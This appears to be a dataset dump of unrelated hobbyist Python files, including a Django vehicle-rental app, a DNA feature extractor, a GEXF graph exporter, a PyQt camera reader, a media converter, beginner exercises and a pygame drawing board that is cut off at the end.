text stringlengths 8 6.05M |
|---|
def view_code(filename):
try:
if input('показать исходный код задачи? [y/n]') == 'y':
with open(filename, 'r', encoding='utf-8') as file:
for line in file:
print(line.rstrip())
except:
print(f'файл {filename} не существует или что-то сломалось')
|
import ppn
import utils
from matplotlib.pylab import *
symbs=utils.symbol_list('lines2')
x=ppn.xtime('.')
specs=['PROT','HE 4','C 12','N 14','O 16']
i=0
for spec in specs:
x.plot('time',spec,logy=True,logx=True,shape=utils.linestyle(i)[0],show=False,title='')
i += 1
ylim(-5,0.2)
legend(loc=0)
xlabel('$\log t / \mathrm{min}$')
ylabel('$\log X \mathrm{[mass fraction]}$')
savefig('abu_evolution.png')
|
from django.contrib.auth.models import Group
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import auth
from .models import Cars, Bikes, Order
from .forms import RegisterForm, CustomerProfileForm, CarUploadForm, OrderForm, BikeUploadForm
from .decorators import unauthenticated_customer, allowed_users,unauthenticated_client
# Create your views here.
@unauthenticated_customer
def customer_login(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = auth.authenticate(request, username=username, password=password)
if user is not None:
auth.login(request, user)
return redirect('/')
else:
return redirect('login')
return render(request, 'account/login.html')
@unauthenticated_customer
def customer_register(request):
if request.method == 'POST' or request.method == 'FILES':
form = RegisterForm(request.POST)
profile_form = CustomerProfileForm(request.POST, request.FILES)
if form.is_valid() and profile_form.is_valid():
user = form.save()
profile = profile_form.save(commit=False)
profile.user = user
group = Group.objects.get(name = 'customer')
user.groups.add(group)
profile.save()
return redirect('/account/customer_login')
else:
form = RegisterForm(request.POST)
profile_form = CustomerProfileForm(request.POST, request.FILES)
return render(request, 'account/register.html', {'form': form, 'customer_profile_form':profile_form})
@login_required()
def customer_logout(request):
auth.logout(request)
return redirect('/')
@unauthenticated_client
def client_login(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = auth.authenticate(request, username=username, password=password)
if user is not None:
auth.login(request, user)
return redirect('client_dashboard')
else:
return redirect('client_login')
return render(request, 'account/client_login.html')
@login_required()
@allowed_users(allowed_roles=['client'])
def client_dashboard(request):
profile = request.user
car = Cars.objects.filter(uploaded_by=profile)
bike = Bikes.objects.filter(uploaded_by=profile)
car_order = Order.objects.filter(car__in=car)
bike_order = Order.objects.filter(bike__in=bike)
return render(request, 'account/client_dashboard.html', {'profile':profile,'car': car, 'bike': bike, 'car_order': car_order, 'bike_order': bike_order })
@login_required()
def client_logout(request):
auth.logout(request)
return redirect('/account/client_login/')
@login_required()
@allowed_users(allowed_roles=['client'])
def upload_car(request):
car = CarUploadForm
if request.method == 'POST' or request.method=='FILES':
car = CarUploadForm(request.POST, request.FILES)
if car.is_valid():
obj = car.save(commit=False)
user = request.user
obj.uploaded_by = user
obj.save()
return redirect('client_dashboard')
return render(request, 'account/upload_car.html',{'car': car})
@login_required()
@allowed_users(allowed_roles=['client'])
def upload_bike(request):
bike = BikeUploadForm
if request.method == 'POST' or request.method == 'FILES':
bike = BikeUploadForm(request.POST, request.FILES)
if bike.is_valid():
obj = bike.save(commit=False)
user = request.user
obj.uploaded_by = user
obj.save()
return redirect('/account/client_dashboard/')
return render(request, 'account/bike_upload.html', {'bike': bike})
@login_required()
@allowed_users(allowed_roles=['customer'])
def rent_car(request, id):
request.session.set_expiry(12000000)
rent = OrderForm
request.session['id'] = id
the_id = request.session['id']
car = Cars.objects.get(id=the_id)
if request.method == 'POST':
rent = OrderForm(request.POST)
if rent.is_valid():
obj = rent.save(commit=False)
user = request.user
obj.customer = user
obj.car = car
obj.save()
return redirect('/')
return render(request, 'account/order_form.html', {'form': rent, 'obj':car})
@login_required()
@allowed_users(allowed_roles=['customer'])
def rent_bike(request, id):
request.session.set_expiry(12000000)
rent = OrderForm
request.session['id'] = id
the_id = request.session['id']
bike = Bikes.objects.get(id=the_id)
if request.method == 'POST':
rent = OrderForm(request.POST)
if rent.is_valid():
obj = rent.save(commit=False)
user = request.user
obj.customer = user
obj.bike = bike
obj.save()
return redirect('/')
return render(request, 'account/order_form.html', {'form': rent, 'obj':bike})
@login_required()
@allowed_users(allowed_roles=['client'])
def carview(request):
profile = request.user
car = Cars.objects.filter(uploaded_by=profile)
return render(request, 'account/car_list.html', {'car':car})
@login_required()
@allowed_users(allowed_roles=['client'])
def bikeview(request):
profile = request.user
bike = Bikes.objects.filter(uploaded_by=profile)
return render(request, 'account/bike_list.html', {'bike':bike})
@login_required()
@allowed_users(allowed_roles=['client'])
def edit_car(request,id):
obj = Cars.objects.get(id=id)
car = CarUploadForm(instance=obj)
if request.method == 'POST' or request.method=='FILES':
car = CarUploadForm(request.POST, request.FILES, instance=obj)
if car.is_valid():
car.save()
return redirect('client_dashboard')
return render(request, 'account/upload_car.html',{'car': car})
@login_required()
@allowed_users(allowed_roles=['client'])
def delete_car(request,id):
obj = Cars.objects.get(id=id)
if request.method == 'POST':
obj.delete()
return redirect('client_dashboard')
return render(request, 'account/delete.html', {'object':obj})
@login_required()
@allowed_users(allowed_roles=['client'])
def edit_bike(request, pk):
obj = Bikes.objects.get(id=pk)
bike = BikeUploadForm(instance=obj)
if request.method == 'POST' or request.method == 'FILES':
bike = BikeUploadForm(request.POST, request.FILES, instance=obj)
if bike.is_valid():
bike.save()
return redirect('client_dashboard')
return render(request, 'account/bike_upload.html',{'bike': bike})
@login_required()
@allowed_users(allowed_roles=['client'])
def delete_bike(request, id):
obj = Bikes.objects.get(id=id)
if request.method == 'POST':
obj.delete()
return redirect('client_dashboard')
return render(request, 'account/delete.html', {'object':obj})
@login_required()
@allowed_users(allowed_roles=['client'])
def confirm_booking(request, id):
obj = Order.objects.get(id=id)
if request.method == 'POST':
obj = Order.objects.get(id=id)
obj.status = 'Confirmed'
obj.save()
return redirect('client_dashboard')
return render(request, 'account/delete.html', {'object':obj})
@login_required()
@allowed_users(allowed_roles=['client'])
def delete_booking(request, id):
obj = Order.objects.get(id=id)
if request.method == 'POST':
obj.delete()
return redirect('client_dashboard')
return render(request, 'account/delete.html', {'object':obj})
@login_required()
@allowed_users(allowed_roles=['client'])
def booking_detail(request):
profile = request.user
car = Cars.objects.filter(uploaded_by=profile)
bike = Bikes.objects.filter(uploaded_by=profile)
car_order = Order.objects.filter(car__in=car)
bike_order = Order.objects.filter(bike__in=bike)
return render(request, 'account/booking_detail.html',
{'profile': profile, 'car': car, 'bike': bike, 'car_order': car_order, 'bike_order': bike_order})
|
class Bai_6():
String1 = ''
String2 = ''
Numberx=0
def __init__(self,string1='',string2='',numberx=''):
self.Numberx=numberx
self.String1=string1
self.String2=string2
def getString(self):
x=input();
self.String2=x
def printString(self):
print(self.String2.upper())
Bai6=Bai_6()
Bai6.getString()
Bai6.printString() |
import cv2
import threading
from PyQt5.QtCore import pyqtSlot, pyqtSignal,QTimer, QDateTime,Qt, QObject
from PyQt5.QtGui import QPixmap,QColor
from PyQt5 import QtCore, QtGui
import time
Camera_Number = 0
Camera_Object = cv2.VideoCapture(Camera_Number)
class GetImageFromCamera(QObject):
def __init__(self, frameCut = ((0, 640), (0, 480)), size = (280, 480), scale = 0.3, time = 50, labelObject = ""):
super().__init__()
self.cameraObj = Camera_Object
self.timerReadImage = QTimer(self)
self.timerReadImage.timeout.connect(self.__ThreadReadCamera)
self.size = size
self.labelObject = labelObject
def __ThreadReadCamera(self):
threadReadCam = threading.Thread(target= self.__GetImageFromCamera, args=(), daemon=True)
threadReadCam.start()
def __GetImageFromCamera(self):
global frame, frameNoFaceMark
global FaceLocationInImage
# global NumberFrameNotFace
# while True:
ret, frameFullSize = self.cameraObj.read()
rgbImage = cv2.cvtColor(frameFullSize, cv2.COLOR_BGR2RGB)
convertToQtFormat = QtGui.QImage(rgbImage.data, rgbImage.shape[1], rgbImage.shape[0],
QtGui.QImage.Format_RGB888)
convertToQtFormat = QtGui.QPixmap.fromImage(convertToQtFormat)
pixmap = QPixmap(convertToQtFormat)
resizeImage = pixmap.scaled(self.size[0], self.size[1], QtCore.Qt.KeepAspectRatio)
# self.PixmapFromCamera.emit(resizeImage)
# time.sleep(0.05)
# if(not self.toBeReadImage):
# return
self.labelObject.setPixmap(resizeImage)
def StopReadImage(self):
self.timerReadImage.stop()
def StartReadImage(self):
self.timerReadImage.start(50)
|
import demoji
import regex as re
# demoji.download_codes()
text = u'منو فالو نمیکنید☹️☹️ یعنی یه دوووونه کامنت وجودره 🤦♀️ همه دنبال یه چیزی میگردن ،خاک برسرتون ،واقعا حت ریده به ت تصویری با ۸۵واقعی❤️'
new = demoji.replace(text, "")
print(new) |
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class CustomUser(AbstractUser):
"""Model definition for CustomUser."""
class Meta:
verbose_name_plural = 'CustomUsers'
def __str__(self):
return self.username |
class DNAAttributeConstruction:
'''parent class for dna translation and feature initialization'''
def __init__(self, sequence_data, labels=None, list_indices=None, chunk=True):
'''Takes whole string{-id, -lab} or list(strings){+/- id, +lab}. generates frags, frag_id, labels'''
self.peptides = None # initialization for subsequent self-checking
# accepts single 'master' sequence
if isinstance(sequence_data, str):
self.seq = sequence_data.upper()
self.fragments, self.frag_index = fragment_stop_delimited(self.seq)
# or a pre-split list of fragments WITH LABELS. If no indicies provided, [0]*n used.
elif isinstance(sequence_data, list):
self.fragments = [seq.upper() for seq in sequence_data]
if list_indices:
self.frag_index = list_indices
else:
self.frag_index = [0]*len(self.fragments)
if chunk:
# If seq_data == str, NO LABELS. intended for accessory functionality only.
self.fragments, self.frag_index, self.labels = fragment_windowed(zip(self.fragments, self.frag_index, labels if labels is not None else [None]*len(self.fragments)))
def decode_dna(self, lookup):
'''translate dna sequence, compile derived AA features'''
self.peptides = []
self.peptide_id = []
self.codon_pref = []
self.aa_hydrophob = []
self.aa_aromatic = []
self.aa_class = []
for j,seq in enumerate(self.fragments):
prot = ''
pid, pref, aa_h, aa_a, aa_c = [],[],[],[],[]
for i in range(0,len(seq),3):
entry = lookup[seq[i:i+3]]
prot += entry['aa']
# add'nl properties:
# pid.append(self.frag_index[j])
pref.append(entry['f_aa']/entry['r_aa'])
aa_h.append(entry['hydrophob_7'])
aa_a.append(entry['aromatic'])
aa_c.append(entry['class'])
self.peptides.append(prot)
# self.peptide_id.append(pid)
self.codon_pref.append(pref)
self.aa_hydrophob.append(aa_h)
self.aa_aromatic.append(aa_a)
self.aa_class.append(aa_c)
return self
def zip_all(self):
'''list of (amino_acid, codon_pref, hydrophob, aromatic, class, global_peptide_index)'''
if self.peptides is None:
print('AttributeError: Nice try. You have to decode the DNA first.')
else:
return [list(zip(aa,pref,aah,aaa,aac))
for aa,pref,aah,aaa,aac
in zip(self.peptides,self.codon_pref,self.aa_hydrophob,
self.aa_aromatic,self.aa_class)]
# DNAFeatureExtraction accessory function
import re
from collections import defaultdict
def fragment_stop_delimited(seq):
'''Find/Split all possible stop-delimited coding frames\naggregate to single list\nreturns (sequences, global indices)'''
frames = [0,1,2] # frames
stops_reg = re.compile('|'.join(['TAA','TAG','TGA'])) # define stops
elements = defaultdict(list) # initialize result container
indicies = defaultdict(list) # initialize indicies container
idx = {0:0,1:1,2:2} # starting frame indicies
# progressively search for stop codons, increment result vectors by frame
i = 0
while i < len(seq):
x = re.search(stops_reg, seq[i:]) # find next stop
if x:
frame = (x.start()+i)%3 # establish frame
sequence = seq[idx[frame]:x.end()+i] # grab sequence from previous frame end
# print(frame, x.group(), sequence)
elements[frame].append(sequence)
indicies[frame].append(idx[frame])
idx[frame] = x.end()+i # update frame start index
i = max(idx.values())-2 # set new search start (next frame)
else: # cap all vectors with the remaining non-stopped sequence
for x in frames:
sequence = seq[idx[x]:]
elements[x].append(sequence[:len(sequence)-(len(sequence)%3)]) # trim to full codons
indicies[x].append(idx[x])
break
# aggregate to single list
fragments = [x for frame in elements.values() for x in frame]
frag_index = [x for frame in indicies.values() for x in frame] # global index
return fragments, frag_index
# DNAFeatureExtraction accessory function
def fragment_windowed(seqs_idx, window=150, offset=60):
'''takes list of tuple(aa_sequence,index) and returns lists of windows & updated indicies'''
chunked = [(frag[idn:idn+window], (idg,idg+idn), lab) for frag,idg,lab in seqs_idx for idn in range((len(frag)-window)%offset, len(frag)-window+1, offset)]
windows, wind_index, labels = list(zip(*chunked))
return list(windows), list(wind_index), list(labels)
def reverse_complement(seq):
rc = {'A':'T', 'C':'G', 'G':'C', 'T':'A'}
return ''.join([rc[x] for x in seq[::-1]])
import numpy as np
import pandas as pd
def codon_prefs(seq,w=None):
'''calculate preference scores for ALL codons'''
scores = []
for i,s in enumerate(seq):
if len(seq[i:i+3])==3:
entry = lookup[seq[i:i+3]]
scores.append(entry['f_aa']/entry['r_aa'])
# group by reading frame
rf_scores = {}
lmin = 1e6
for j in [0,1,2]:
rf_scores[j] = scores[j::3]
if len(rf_scores[j])<lmin: # find min length
lmin = len(rf_scores[j])
# truncate to min reading frame length
for i in rf_scores.keys():
rf_scores[i] = rf_scores[i][:lmin]
# cast to dataframe
df = pd.DataFrame.from_dict(rf_scores)
# calculate rolling probability score
if isinstance(w, int):
df = df.rolling(window=w,center=True).apply(lambda x: np.exp(sum(np.log(x))/w)) # from the 1983 paper
return df
import pandas as pd
def codon_lookup(path='../data/CodonUsage_ecoli.csv', extrude_=None):
'''import codon lookup csv as both a pd.DataFrame and lookup dict. returns (codons,lookup)'''
codons = pd.read_csv(path)
codons = codons.set_index('codon')
if extrude_:
weights_new = codons.groupby('aa').f_aa.apply(extrude, k=extrude_)
codons['f_mod'] = [value for probs in weights_new for value in probs]
# print(codons.head(5))
lookup = codons.to_dict(orient='index')
return codons, lookup
def seq_merge(seqs):
'''Merge list of overlapping strings (de-window). Assumes pre-ordered list.'''
seqs = list(seqs)
master = seqs[0]
if len(seqs)>1:
overlap = 0
for x in range(1,len(seqs[1])):
if seqs[1][:x] in master:
overlap = x
master = ''.join([master,''.join(map(lambda x: x[overlap:], seqs[1:]))])
return master
# accessory function for codon_lookup. not generally used.
def extrude(y,k=4):
x = [(z+.5)**k for z in y]
xs = [z/sum(x) for z in x]
return xs
## ACCESSORY STATPACK FUCTIONS
def zerocross_pack(X): # intended for hydrophob array
'''Takes 1d array of numerical values and returns a (5,) np.array of distribution features'''
cross = []
for k in range(1,len(X)):
if X[k]*X[k-1]<0:
cross.append(k)
if len(cross)>2:
t = np.ediff1d(cross)
tm = t.mean()
tsd = t.std()
tp1 = np.percentile(t,5)
tp2 = np.percentile(t,95)
return np.hstack([len(cross)/len(X),tm,tsd,tp1,tp2])
else:
return np.hstack([1/len(X),0,0,0,0])
def codon_bias_rms(X, lookup, AAs, select='FULL'):
'''Takes a DNA sequence and calculates the RMS[or 0] of codon bias for ALL(1,), [SELECT](1,), or FULL(21,) amino acids'''
# AAs = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']
x = [(lookup[X[i:i+3]]['aa'],lookup[X[i:i+3]]['f_aa']-lookup[X[i:i+3]]['r_aa']) for i in range(0,len(X),3)]
if select=='ALL':
return (sum([z[1]**2 for z in x])/len(x))**.5
elif select=='FULL':
df = pd.DataFrame(x)
values = df[1].groupby(df[0]).apply(lambda x: (sum(x**2)/len(x))**.5)
return np.hstack([(sum([z[1]**2 for z in x])/len(x))**.5, values[AAs].fillna(0)])
else:
tmp = [z[1]**2 for z in x if z[0]==select]
return (sum(tmp)/len(tmp)) if len(tmp)>0 else 0.
def aa_pack(X, AAs): # distribution of individual amino acids
'''Takes AA sequences and returns a (100,) np.array of distribution features for all AAs (present or not)'''
# AAs = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']
L = len(X)
result = []
for aa in AAs:
aas = [pos for pos,char in enumerate(X) if char==aa]
l = len(aas)
if l>2:
t = np.ediff1d(aas)
tm = t.mean()
tsd = t.std()
tp1 = np.percentile(t,5)
tp2 = np.percentile(t,95)
result.append([l/L,tm,tsd,tp1,tp2])
else:
result.append([l/L,0,0,0,0])
return np.hstack(result)
def class_pack(X):
'''Takes list of AA classes and returns a (32,) np.array of distribution features'''
classes = ['polar','nonpolar','basic','acidic']
result = []
for thing in classes:
result.append(statpack1(np.array([i for i,x in enumerate(X) if x == thing])))
return np.hstack(result)
def statpack1(X):
'''Takes numerical array and returns a (8,) np.array of distribution features'''
if len(X)>1:
m = X.mean()
sd = X.std()
p1 = np.percentile(X,5)
p2 = np.percentile(X,95)
t = np.ediff1d(X)
tm = t.mean()
tsd = t.std()
tp1 = np.percentile(t,5)
tp2 = np.percentile(t,95)
return np.hstack([m,sd,p1,p2,tm,tsd,tp1,tp2])
else:
return np.zeros(8)
def statpack2(X):
'''Takes 2d numerical array and returns a (64,) np.array of distribution features'''
arr = {}
for z in [0,1]:
m = statpack1(X.mean(axis=z))
sd = statpack1(X.std(axis=z))
p1 = statpack1(np.percentile(X,5,axis=z))
p2 = statpack1(np.percentile(X,95,axis=z))
arr[z] = np.hstack([m,sd,p1,p2])
return np.hstack(arr.values()) |
import datetime
import simplejson
class BaseConverter(object):
html_codes = (
('&', '&'),
('<', '<'),
('>', '>'),
('"', '"'),
("'", '''),
)
def __init__(self, graph):
self.graph = graph
def encode_html(self, value):
if isinstance(value, basestring):
for replacement in self.html_codes:
value = value.replace(replacement[0], replacement[1])
return value
class GEXFConverter(BaseConverter):
" Converts a Sylva neo4j graph to GEXF 1.2"
header = """<?xml version="1.0" encoding="UTF-8"?>
<gexf xmlns="http://www.gexf.net/1.2draft" xmlns:viz="http://www.gexf.net/1.2draft/viz" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.gexf.net/1.2draft http://www.gexf.net/1.2draft/gexf.xsd" version="1.2">
<meta lastmodifieddate="%s">
<creator>Sylva</creator>
<description>A Sylva exported file</description>
</meta>
<graph mode="static" defaultedgetype="directed">"""
def export(self):
today = datetime.datetime.now()
date = "%s-%s-%s" % (today.year, today.month, today.day)
attribute_counter = 0
node_attributes = {}
edge_attributes = {}
nodes = ''
for node in self.graph.nodes.all():
nodes += """
<node id="%s" label="%s">
<attvalues>""" % (node.id, node.label)
for key, value in node.properties.iteritems():
if key not in node_attributes:
node_attributes[key] = attribute_counter
attribute_counter += 1
nodes += """
<attvalue for="%s" value="%s"/>""" % (node_attributes[key],
self.encode_html(value))
nodes += """
</attvalues>
</node>"""
attribute_counter = 0
edges = ''
for edge in self.graph.relationships.all():
edges += """
<edge id="%s" source="%s" target="%s" label="%s">
<attvalues>""" % (edge.id,
edge.source.id,
edge.target.id,
edge.label)
for key, value in edge.properties.iteritems():
if key not in edge_attributes:
edge_attributes[key] = attribute_counter
attribute_counter += 1
edges += """
<attvalue for="%s" value="%s"/>""" % (edge_attributes[key],
self.encode_html(value))
edges += """
</attvalues>
</edge>"""
node_attributes_xml = ''
for key, value in node_attributes.iteritems():
node_attributes_xml += """
<attribute id="%s" title="%s" type="string"/>""" % (value,
key)
edge_attributes_xml = ''
for key, value in edge_attributes.iteritems():
edge_attributes_xml += """
<attribute id="%s" title="%s" type="string"/>""" % (value,
key)
gephi_format = """%s
<attributes class="node">
%s
</attributes>
<attributes class="edge">
%s
</attributes>
<nodes>%s
</nodes>
<edges>%s
</edges>
</graph>
</gexf>""" % (self.header, date, node_attributes_xml,
edge_attributes_xml, nodes, edges)
return gephi_format
def stream_export(self):
yield self.header
# Nodes
yield '<nodes>'
attribute_counter = 0
node_attributes = {}
edge_attributes = {}
for node in self.graph.nodes.iterator():
node_text = """
<node id="%s" label="%s">
<attvalues>""" % (node.id, node.label)
for key, value in node.properties.iteritems():
if key not in node_attributes:
node_attributes[key] = attribute_counter
attribute_counter += 1
node_text += """
<attvalue for="%s" value="%s"/>""" % (node_attributes[key],
self.encode_html(value))
node_text += """
</attvalues>
</node>"""
yield node_text
yield '</nodes><edges>'
# Edges
attribute_counter = 0
edges = ''
for edge in self.graph.relationships.iterator():
edge_text = """
<edge id="%s" source="%s" target="%s" label="%s">
<attvalues>""" % (edge.id,
edge.source.id,
edge.target.id,
edge.label)
for key, value in edge.properties.iteritems():
if key not in edge_attributes:
edge_attributes[key] = attribute_counter
attribute_counter += 1
edge_text = """
<attvalue for="%s" value="%s"/>""" % (edge_attributes[key],
self.encode_html(value))
edge_text += """
</attvalues>
</edge>"""
yield edge_text
yield """
</edges>
"""
# Node attributes
node_attributes_xml = ''
for key, value in node_attributes.iteritems():
node_attributes_xml += """
<attribute id="%s" title="%s" type="string"/>""" % (value,
key)
yield """
<attributes class="node">
%s
</attributes>
""" % (node_attributes_xml)
# Edge attributes
edge_attributes_xml = ''
for key, value in edge_attributes.iteritems():
edge_attributes_xml += """
<attribute id="%s" title="%s" type="string"/>""" % (value,
key)
yield """
<attributes class="edge">
%s
</attributes>
""" % (edge_attributes_xml)
yield """
</graph>
</gexf>"""
|
from random import randint
print("This is an interactive guessing game!")
print("You have to enter a number between 1 and 99 to find out the secret number.")
print("Type 'exit' to end the game.")
print("Good luck!\n")
number = randint(1, 99)
answer = 0
attempt = 0
while (answer != number):
try:
print("What's your guess between 1 and 99?")
text = input(">> ")
if (text == "exit"):
print("Goodbye!")
quit()
answer = int(text)
attempt += 1
if (answer > number):
print("Too high!")
elif (answer < number):
print("Too low!")
except ValueError:
print("That's not a number.")
answer = 0
if (number == 42):
print("The answer to the ultimate question of life, the universe and everything is 42.")
if (attempt == 1):
print("Congratulations! You got it on your first try!")
else:
print("Congratulations, you've got it!")
print(f"You won in {attempt} attempts!")
|
import os
from pydub import AudioSegment
from subprocess import call
import youtubetomp3.core.utils as Utils
class Converter(object):
"""Converter from video to needed extension"""
def __init__(self, user):
super(Converter, self).__init__()
self.user = user
def convert(self, path, ext):
path = Utils.createPath(os.path.basename(path), self.user)
filename = Utils.uniquify(Utils.getName(path) + '.' + ext)
print 'Path to convert: ' + path
#video = AudioSegment.from_file(path)
path_to_convert = Utils.createPath(filename, self.user)
if ext == 'ogg':
call(["ffmpeg", "-i", path, "-map", "0:1", "-acodec", "libvorbis", "-aq", "50", path_to_convert])
#video.export(path_to_convert, format=ext,
# codec="libvorbis", parameters=["-aq", "50"])
elif ext == 'mp4':
call(["ffmpeg", "-i", path, "-vcodec", "libx264", "-preset", "ultrafast", "-b:v", "768k", path_to_convert])
else:
call(["ffmpeg", "-i", path, path_to_convert])
#video.export(path_to_convert, format=ext)
return Utils.createLink(filename, self.user)
|
# Guided Exploration No. 3
# Ryan C. Rose
# Import the "random" library for use in the program.
import random
# Initialize the "possible_names" list for future use.
possible_names = []
# Open/Create a text file titled "rape-names-output.txt" and assign writing access to it to the outputFile variable
outputFile = open('rap-names-output.txt', 'w')
# Temporarily opens the file "rap-names.txt" for reading within the "dataFile" variable for the duration of the "with" block.
with open('rap-names.txt', 'r') as dataFile:
# Cycles through every line of "dataFile"
for name in dataFile:
# Appends the lines from "dataFile" to the "possible_names" list and performs a right strip on the lines to remove the line feed.
possible_names.append(name.rstrip())
# Asks the user to input how many rap names they'd like to create (Which will be used in the following loop)
count = int(input('How many rap names would you like to create? '))
# Asks the user how many parts the rap names will have.
parts = int(input('How many parts should the name contain? '))
# Loop for the user-inputted number of rap names
for i in range(count):
# Initialize/Clear the "name_parts" list.
name_parts = []
# Loop for the user-inputted number of parts to be used for the names
for j in range(parts):
# Append "name_parts" with a random entry from the "possible_names" list.
name_parts.append(
possible_names[random.randint(0, len(possible_names)-1)])
# Write the rap name to the "outputFile" by formatting a string made up of the "name_parts" list with its entries separated by spaces and culminating in a line feed
outputFile.write(f"{' '.join(name_parts)}\n")
# Print out to the console what was just written to the "outputFile"
print(f"{' '.join(name_parts)}")
# Close the "outputFile"
outputFile.close()
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# coding=utf-8
list1 = ["这", "是", "一个", "测试"]
for index, item in enumerate(list1):
print(index, item)
for index, item in enumerate(list1, 1):
print(index, item) |
from django.contrib import admin
from .models import HeadTeacher
# Register your models here.
@admin.register(HeadTeacher)
class HeadTeacherAdmin(admin.ModelAdmin):
list_display = ['classes','semester','teacher'] |
class Node(object):
"""docstring for Node"""
def __init__(self, index):
self.index = index
self.left_child = None
self.right_child = None
class BinaryTree(object):
"""docstring for BinaryTree"""
def __init__(self, root):
self.root = root
def pre_travel(self,node):
if not node:
return
print(node.index)
self.pre_travel(node.left_child)
self.pre_travel(node.right_child)
node_dict = {}
for i in range(1,10):
node_dict[i] = Node(i)
node_dict[1].left_child = node_dict[2]
node_dict[1].right_child = node_dict[3]
node_dict[2].left_child = node_dict[5]
node_dict[2].right_child = node_dict[6]
node_dict[3].left_child = node_dict[7]
node_dict[7].left_child = node_dict[8]
node_dict[7].right_child = node_dict[9]
tree = BinaryTree(node_dict[1])
tree.pre_travel(tree.root) |
# Stacement
print("Hello world")
# Expression
x = 10
y = x + 2
print(x,y)
# String
title = "Pyhon Course"
print(title[0], title[1], title[2], title[-1], title[-2])
# String Operation
name = 'Mehedi Amin'
print(name.title())
print(name.upper())
print(name.lower())
print(name.upper().lower().title())
#String Concatenation
first_name = "Steve"
last_name = "Jobs"
name = first_name +'\n'+ last_name
print(name)
name = " Mr. X "
print('_' + name + '_')
print('_' + name.lstrip()+ '_')
# Printing Single and Double Quote
shop_name = "Rahim's Shop"
print(shop_name)
shop_name = 'Rahim" Shop'
print(shop_name)
shop_name = 'Rahim\'s Shop'
print(shop_name)
# Find word in sentence
sentence = "A quick brown fox jumps over the lazy dog"
print(sentence.find('fox'))
print(sentence.find('foxs'))
#Replace text
sentence = 'A quick brown fox jumps over the lazy dog'
sentence = sentence.replace('fox','tiger')
print(sentence)
sentence = "A quick brown fox jumps over the lazy fox"
sentence = sentence.replace('fox', 'tiger')
print(sentence)
#Print separator ice
x = 'Dhaka'
y = 'Bogra'
z = 'Comilla'
a = 300
b = 200
c = 400
print('Dhaka','|','Bogra','|','comilla')
print('300','|','200','|','400')
print(x,y,z, sep=' | ')
person = "Mr.x's age is 77"
print(person)
person = "{name}'s age is {age}"
print(person.format(name='Mehedi Amin', age = 20))
person = '%s\'s age is %d'
print(person % ('Bil', 55))
name = "Taylor Swift"
part_of_name = name[7:-1]
print(part_of_name)
|
__author__ = 'Skyeyes'
import pygame, sys, random
from pygame.locals import *
pygame.init()
pygame.display.set_caption("drawboard")
font1 = pygame.font.Font(None, 20)
font2 = pygame.font.Font(None, 40)
font3 = pygame.font.Font(None, 80)
font4 = pygame.font.Font(None, 100)
white = 255, 255, 255
red = 220, 50, 50
yellow = 230, 230, 50
black = 0, 0, 0
shapestyle = ""
move = True
screen = pygame.display.set_mode((1200, 800))
class Shape:
def __init__(self, begin_x, begin_y, end_x, end_y, shapestyle):
self.begin_x = begin_x
self.begin_y = begin_y
self.end_x = end_x
self.end_y = end_y
self.shapestyle = shapestyle
def draw(self):
model().judge_draw_shape(self.begin_x, self.begin_y, self.end_x, self.end_y, self.shapestyle)
class model:
def draw_block(self, color, pos_x, pos_y, width, height, linewidth=0):
pygame.draw.rect(screen, color, (pos_x, pos_y, width, height), linewidth)
def print_text(self, font, x, y, text, color=(255, 255, 255)):
imgText = font.render(text, True, color)
screen.blit(imgText, (x, y))
def judge_draw_shape(self, begin_x, begin_y, end_x, end_y, shapestyle = ""):
if shapestyle == "rectangle":
pygame.draw.rect(screen, black, (begin_x, begin_y, (end_x-begin_x), (end_y-begin_y)), 2)
elif shapestyle == "square":
width = min(abs(end_x-begin_x), abs(end_y-begin_y))
pos_x = begin_x if (end_x-begin_x)>0 else begin_x-width
pos_y = begin_y if (end_y-begin_y)>0 else begin_y-width
pygame.draw.rect(screen, black, (pos_x, pos_y, width, width), 2)
elif shapestyle == "circle":
radius = min(abs((end_x-begin_x)//2), abs((end_y-begin_y)//2))
pos_x = radius+begin_x if (end_x-begin_x)>0 else begin_x-radius
pos_y = radius+begin_y if (end_y-begin_y)>0 else begin_y-radius
if abs(radius) > 4:
pygame.draw.circle(screen, black, (pos_x, pos_y), abs(radius), 2)
else:
pygame.draw.circle(screen, black, (pos_x, pos_y), abs(radius), 0)
elif shapestyle == "ellipse":
pos_x = begin_x if (end_x-begin_x)>0 else end_x
pos_y = begin_y if (end_y-begin_y)>0 else end_y
if min(abs(end_x-begin_x), abs(end_y-begin_y)) > 4:
pygame.draw.ellipse(screen, black, (pos_x, pos_y, abs(end_x-begin_x), abs(end_y-begin_y)), 2)
else:
pygame.draw.ellipse(screen, black, (pos_x, pos_y, abs(end_x-begin_x), abs(end_y-begin_y)), 0)
def makebutton():
model().draw_block(yellow, 10, 10, 50, 50)
model().draw_block(black, 20, 25, 30, 20, 2)
model().draw_block(yellow, 10, 80, 50, 50)
model().draw_block(black, 25, 95, 20, 20, 2)
model().draw_block(yellow, 10, 150, 50, 50)
pygame.draw.circle(screen, black, (35, 175), 10, 2)
model().draw_block(yellow, 10, 220, 50, 50)
pygame.draw.ellipse(screen, black, (20, 235, 30, 20), 2)
model().draw_block(black, 100, 100, 1000, 600, 2)
model().draw_block(yellow, 10, 290, 50, 50)
model().print_text(font1, 17, 306, "move", black)
shapelist = []
def save_shape(begin_x, begin_y, end_x, end_y):
if shapestyle == "rectangle":
shapelist.append(Shape(begin_x, begin_y, end_x, end_y, "rectangle"))
elif shapestyle == "square":
shapelist.append(Shape(begin_x, begin_y, end_x, end_y, "square"))
elif shapestyle == "circle":
shapelist.append(Shape(begin_x, begin_y, end_x, end_y, "circle"))
elif shapestyle == "ellipse":
shapelist.append(Shape(begin_x, begin_y, end_x, end_y, "ellipse"))
def judgemoveshape(x, y):
i = 0
for each in shapelist:
if each.begin_x <= x <= each.end_x and each.begin_y <= y <= each.end_y:
return i
i += 1
